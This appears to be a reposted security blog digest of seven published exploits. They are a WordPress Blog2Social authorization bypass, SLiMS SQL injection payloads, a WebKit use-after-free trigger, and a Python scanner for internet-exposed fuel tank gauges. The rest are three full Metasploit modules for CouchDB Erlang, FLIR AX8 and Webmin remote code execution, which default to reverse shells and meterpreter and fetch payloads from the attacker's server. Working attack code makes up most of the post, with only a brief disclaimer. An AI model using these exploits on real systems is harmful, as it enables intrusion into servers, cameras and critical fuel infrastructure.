[Vulnerability Repository] PoCs & Exploits Recently Published by the 0day Today Team

admin, 2023-01-25 23:56:51

Disclaimer

This public account is for technical exchange and learning only. Any direct or indirect consequences or losses caused by using the information provided by this public account are the sole responsibility of the user; this account merely relays knowledge, taken from the community and given back to it.

1. WordPress Blog2Social 6.9.11 Missing Authorization Vulnerability (CVE-2022-3622)

Affected versions: <= 6.9.11

Social Media Auto Post & Scheduler is a plugin from Blog2Social/Adenion that gives content creators a quick way to share site content to their social media accounts. It offers automatic post sharing and optimized scheduling, and extends some of its features to subscribers so they can share posts to their own social media accounts. Unfortunately, this is implemented insecurely: an authenticated attacker can update these settings even without authorization.
Poc:
/wp-admin/admin.php?page=blog2social-settings

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Cookie:

b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce>
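The defect class behind this entry is a settings endpoint that confirms the caller is logged in but never checks whether they are allowed to change site-wide settings. The following is an added illustration, not Blog2Social's code: a hypothetical WordPress AJAX handler (option name, field list and hook name are assumed for the example) shown first with the missing authorization check and then in a hardened form.

```php
<?php
// Added illustration (not Blog2Social's code): a hypothetical WordPress AJAX
// handler that saves plugin settings. The first version shows the class of
// defect described above (any logged-in user can save settings); the second
// adds the checks a privileged settings endpoint needs.

// Hypothetical option name and field list; assumed for this example only.
const EXAMPLE_OPTION = 'example_social_meta_tags';
const EXAMPLE_FIELDS = ['og_default_title', 'og_default_desc', 'card_default_type'];

// Collect and sanitize the posted fields (shared by both handlers).
function example_collect_settings() {
    $settings = [];
    foreach (EXAMPLE_FIELDS as $field) {
        $settings[$field] = isset($_POST[$field])
            ? sanitize_text_field(wp_unslash($_POST[$field]))
            : '';
    }
    return $settings;
}

// Vulnerable pattern: reachable by any authenticated user via admin-ajax.php,
// with no capability check, so a subscriber can overwrite site-wide settings.
function example_save_settings_vulnerable() {
    update_option(EXAMPLE_OPTION, example_collect_settings());
    wp_send_json_success();
}

// Hardened pattern: verify the CSRF nonce bound to this action, then require a
// capability that only administrators hold before touching the option.
function example_save_settings_hardened() {
    // Dies with a 403 response when the nonce is missing or invalid.
    check_ajax_referer('example_save_settings', 'security');
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'insufficient permissions'], 403);
    }
    update_option(EXAMPLE_OPTION, example_collect_settings());
    wp_send_json_success();
}

// wp_ajax_* hooks only fire for logged-in users, which is why a missing
// capability check matters: "logged in" is not "authorized".
add_action('wp_ajax_example_save_settings', 'example_save_settings_hardened');
```

Note that the PoC request above already carries a `b2s_security_nonce` value, so a nonce check on its own is not the fix: a subscriber can obtain a valid nonce for their own session. The authorization gap is closed by the capability check, which ties the action to a role that is actually permitted to change site-wide settings.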

2. Senayan Library Management System 9.5.0 SQL Injection Vulnerability

The keywords parameter is vulnerable to SQL injection.
Poc:
Parameter: keywords (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#

3. WebKit HTMLSelectElement UAF Vulnerability

If the length of an HTMLSelectElement is set to a value larger than the number of existing options, dummy HTMLOptionElements are created. These HTMLOptionElements are stored as raw pointers in HTMLSelectElement::m_listItems. When `surroundContents()` {1} is called, all children of the parent element (`selectElement`) are replaced. On the second call it frees all of the dummy HTMLOptionElements. However, `m_listItems` still holds pointers to all of these freed elements, which leads to a UAF when we try to access `selectElement.length` {2}.
Poc:
<script>
function jsfuzzer() {
  window.addEventListener("DOMNodeRemoved", eventhandler3);
  svgvar00024.append(svgvar00021);
}

var i = 0;
function eventhandler3() {
  i++;
  if (i > 1) { window.removeEventListener("DOMNodeRemoved", eventhandler3); }
  var var00001 = document.createRange();
  try { var00001.surroundContents(selectElement); } catch(e) { } // {1}
  selectElement.length = 2; // {2}
  // {3} - Need 1 of these 2 lines
  console.log(selectElement.length);
  //var var00170 = selectElement.item(1%selectElement.length);
}
</script>
<body onload=jsfuzzer()>
<svg id="svgvar00001" >
  <glyph id="svgvar00021"/>
  <altGlyph id="svgvar00024"/>
</svg>
<select id="selectElement">a</select>

4. Automatic Tank Gauge (ATG) Remote Configuration Disclosure Exploit

In 2015, Metasploit creator HD Moore published an article disclosing more than 5,800 publicly accessible automatic tank gauges (ATGs) at gas stations. Besides monitoring for leaks, these systems help measure fluid level and tank temperature, and alert operators when tank volume is too high or reaches a critically low level. ATGs are used at nearly every gas station in the US and in tens of thousands of systems internationally. They are typically manufactured by Veeder-Root, a vendor of fuel dispensers, payment systems and forecourt merchandise. For remote monitoring of these fuel systems, operators commonly configure the ATG serial interface on an Internet-facing TCP port (usually TCP 10001).
Poc:
#!/usr/bin/env python3

import time
import socket

# One host per line; the file is read to completion and closed by the with-block.
with open("/tmp/ATG_SCAN.txt", 'r') as atg_file:
    for line in atg_file.read().splitlines():
        try:
            atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            port = 10001
            search_str = 'IN-TANK INVENTORY'
            # Veeder-Root command: SOH (0x01) + function code I20100 + newline
            msg = str('\x01' + 'I20100' + '\n').encode('ascii')
            atg_socket.connect((line, port))
            atg_socket.send(msg)
            time.sleep(.25)
            response = atg_socket.recv(1024).decode()
            if search_str in response:
                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
                    file2.write(line + "\t ->\tATG Device\n")
            # Close the socket whether or not the banner matched.
            atg_socket.close()
        except:
            pass

5. Apache CouchDB Erlang Remote Code Execution Vulnerability (CVE-2022-24706)

In Apache CouchDB versions prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.

Poc:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Retry
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck
  require 'msf/core/exploit/powershell'
  require 'digest'

  # Constants required for communicating over the Erlang protocol defined here:
  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
  EPM_NAME_CMD = "\x00\x01\x6e".freeze
  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze
  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze
  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze
  COOKIE = 'monster'.freeze
  COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Couchdb Erlang RCE',
        'Description' => %q{
          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without
          authenticating and gain admin privileges.
        },
        'Author' => [
          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery
          '1F98D',                     # Erlang Cookie RCE exploit
          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit
          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit
          'jheysel-r7',                # Msf Module
        ],
        'References' => [
          [ 'EDB', '49418' ],
          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],
          [ 'CVE', '2022-24706'],
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'linux'],
        'Payload' => {
          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method
        },
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-01-21',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      ),
    )

    register_options(
      [
        Opt::RPORT(4369)
      ]
    )
  end

  def check
    erlang_ports = get_erlang_ports
    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?

    erlang_ports.each do |erlang_port|
      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
      # successful and the target as well as the specific socket used in this instance is vulnerable
      sock = connect_to_erlang_server(erlang_port.to_i)
      if sock.instance_of?(Socket)
        @vulnerable_socket = sock
        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')
      else
        next
      end
    end
    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be patched')
  end

  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers
  #
  # @return [Array] An array of port numbers for discovered Erlang Servers.
  def get_erlang_ports
    erlang_ports = []
    begin
      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")
      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })
      # request Erlang nodes
      sock.put(EPM_NAME_CMD)
      sleep datastore['WfsDelay']
      res = sock.get_once
      unless res && res.include?("\x00\x00\x11\x11name couchdb")
        print_error('Did not find any Erlang nodes')
        return erlang_ports
      end

      print_status('Successfully found EDPM socket')
      res.each_line do |line|
        erlang_ports << line.match(/\s(\d+$)/)[0]
      end
    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
      print_error("Error connecting to EDPM: #{e.class} #{e}")
      disconnect
      return erlang_ports
    end
    erlang_ports
  end

  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the
  # default erlang cookie value in Apache CouchDB installations before 3.2.2
  #
  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server
  def connect_to_erlang_server(erlang_port)
    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
    print_status('Connection successful')
    challenge = retry_until_truthy(timeout: 60) do
      sock.put(NAME_MSG)
      sock.get_once(5) # ok message
      sock.get_once
    end
    # The expected successful response from the target should start with \x00\x1C
    unless challenge && challenge.include?("\x00\x1C")
      print_error('Connecting to the Erlang server was unsuccessful')
      return
    end

    challenge = challenge[9..12].unpack('N*')[0]
    challenge_reply = "\x00\x15r\x01\x02\x03\x04"
    md5 = Digest::MD5.new
    md5.update(COOKIE + challenge.to_s)
    challenge_reply << [md5.hexdigest].pack('H*')
    sock.put(challenge_reply)
    sleep datastore['WfsDelay']
    challenge_response = sock.get_once

    if challenge_response.nil?
      print_error('Authentication was unsuccessful')
      return
    end
    print_status('Erlang challenge and response completed successfully')

    sock
  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
    disconnect
    return
  end

  def compile_cmd(cmd)
    msg = ''
    msg << COMMAND_PREFIX
    msg << [cmd.length].pack('S>')
    msg << cmd
    msg << "jw\x04user"
    payload = ("\x70" + CTRL_DATA + msg)
    ([payload.size].pack('N*') + payload)
  end

  def execute_command(cmd, opts = {})
    payload = compile_cmd(cmd)
    print_status('Sending payload... ')
    opts[:sock].put(payload)
    sleep datastore['WfsDelay']
  end

  def exploit_socket(sock)
    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded, { sock: sock })
    when :linux_dropper, :win_dropper
      execute_cmdstager({ sock: sock })
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end

  def exploit
    # If the check method has already been run, use the vulnerable socket that has already been identified
    if @vulnerable_socket
      exploit_socket(@vulnerable_socket)
    else
      erlang_ports = get_erlang_ports
      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)

      erlang_ports.each do |erlang_port|
        sock = connect_to_erlang_server(erlang_port.to_i)
        next unless sock.instance_of?(Socket)

        exploit_socket(sock)
      end
    end
  end
end

6. FLIR AX8 1.46.16 Remote Command Injection Vulnerability (CVE-2022-37061)

All FLIR AX8 thermal sensor camera versions up to and including 1.46.16 are vulnerable to remote command injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint. The module uses the vulnerability to upload and execute a payload that gains root privileges.
Poc:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FLIR AX8 unauthenticated RCE',
        'Description' => %q{
          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
          in the res.php endpoint.

          This module uses the vulnerability to upload and execute payloads gaining root privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
          'h00die-gr3y' # metasploit module
        ],
        'References' => [
          ['CVE', '2022-37061'],
          ['PACKETSTORM', '168114'],
          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
        ],
        'DisclosureDate' => '2022-08-19',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  def execute_command(cmd, _opts = {})
    action_id = rand(1..40)
    return send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'uri' => normalize_uri(target_uri.path, 'res.php'),
      'vars_post' => {
        'action' => 'alarm',
        'id' => "#{action_id};#{cmd}"
      }
    })
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    print_error("Communication error occurred: #{e.message}")
    return nil
  end

  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
  def check
    print_status("Checking if #{peer} can be exploited!")
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end

    return Exploit::CheckCode::Unknown('No response received from the target!') unless res

    print_status("Elapsed time: #{elapsed_time} seconds.")
    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    end
  end
end

7. Webmin 1.984 File Manager Remote Code Execution Vulnerability (CVE-2022-0824)

In Webmin version 1.984, any authenticated low-privilege user without access rights to the File Manager module can interact with file manager functionality such as downloading files from remote URLs and changing file permissions. By chaining these functions in the file manager, remote code execution can be achieved via a crafted .cgi file.
Poc:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Webmin
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin File Manager RCE',
        'Description' => %q{
          In Webmin version 1.984, any authenticated low privilege user without access rights to
          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and
          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
          functionalities in the file manager.
        },
        'Author' => [
          'faisalfs10x', # discovery
          'jheysel-r7'   # module
        ],
        'References' => [
          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit
          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit
          [ 'CVE', '2022-0824']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Privileged' => true,
        'Targets' => [
          [
            'Automatic (Unix In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-02-26',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])
      ]
    )
  end

  def check
    webmin_check('0', '1.984')
  end

  def login
    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])
  end

  def download_remote_url
    print_status('Fetching payload from HTTP server')

    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Encoding' => 'gzip, deflate',
        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With' => 'XMLHttpRequest',
        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'
      },
      'vars_get' => {
        'module' => 'filemin'
      }
    })

    fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res
    fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')
    register_file_for_cleanup("/usr/share/webmin/#{@file_name}")
  end

  def modify_permissions
    print_status('Modifying the permissions of the uploaded payload to 0755')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'headers' => {
        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'
      },
      'vars_get' => {
        'module' => 'filemin',
        'page' => '1',
        'paginate' => '30'
      },
      'vars_post' => {
        'name' => @file_name,
        'perms' => '0755',
        'applyto' => '1',
        'path' => '/usr/share/webmin'
      }
    })
    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302
  end

  def exec_revshell
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(datastore['TARGETURI'], @file_name),
      'headers' => {
        'Connection' => 'keep-alive'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500
  end

  def on_request_uri(cli, request)
    print_status("Request '#{request.method} #{request.uri}'")
    print_status('Sending payload ...')
    send_response(cli, payload.encoded,
                  'Content-Type' => 'application/octet-stream')
  end

  def exploit
    start_service
    @file_name = (get_resource.gsub('/', '') + '.cgi')
    cookie = login
    fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?
    print_status('Downloading remote url')
    download_remote_url
    print_status('Finished downloading remote url')
    modify_permissions
    exec_revshell
  end
end

Originally published on the WeChat public account (Hack All): [Vulnerability Repository] PoCs & Exploits Recently Published by the 0day Today Team

Posted by admin. Please keep this link when reposting (CN-SEC Chinese Network; thanks to the original author for their work): http://cn-sec.com/archives/1403577.html
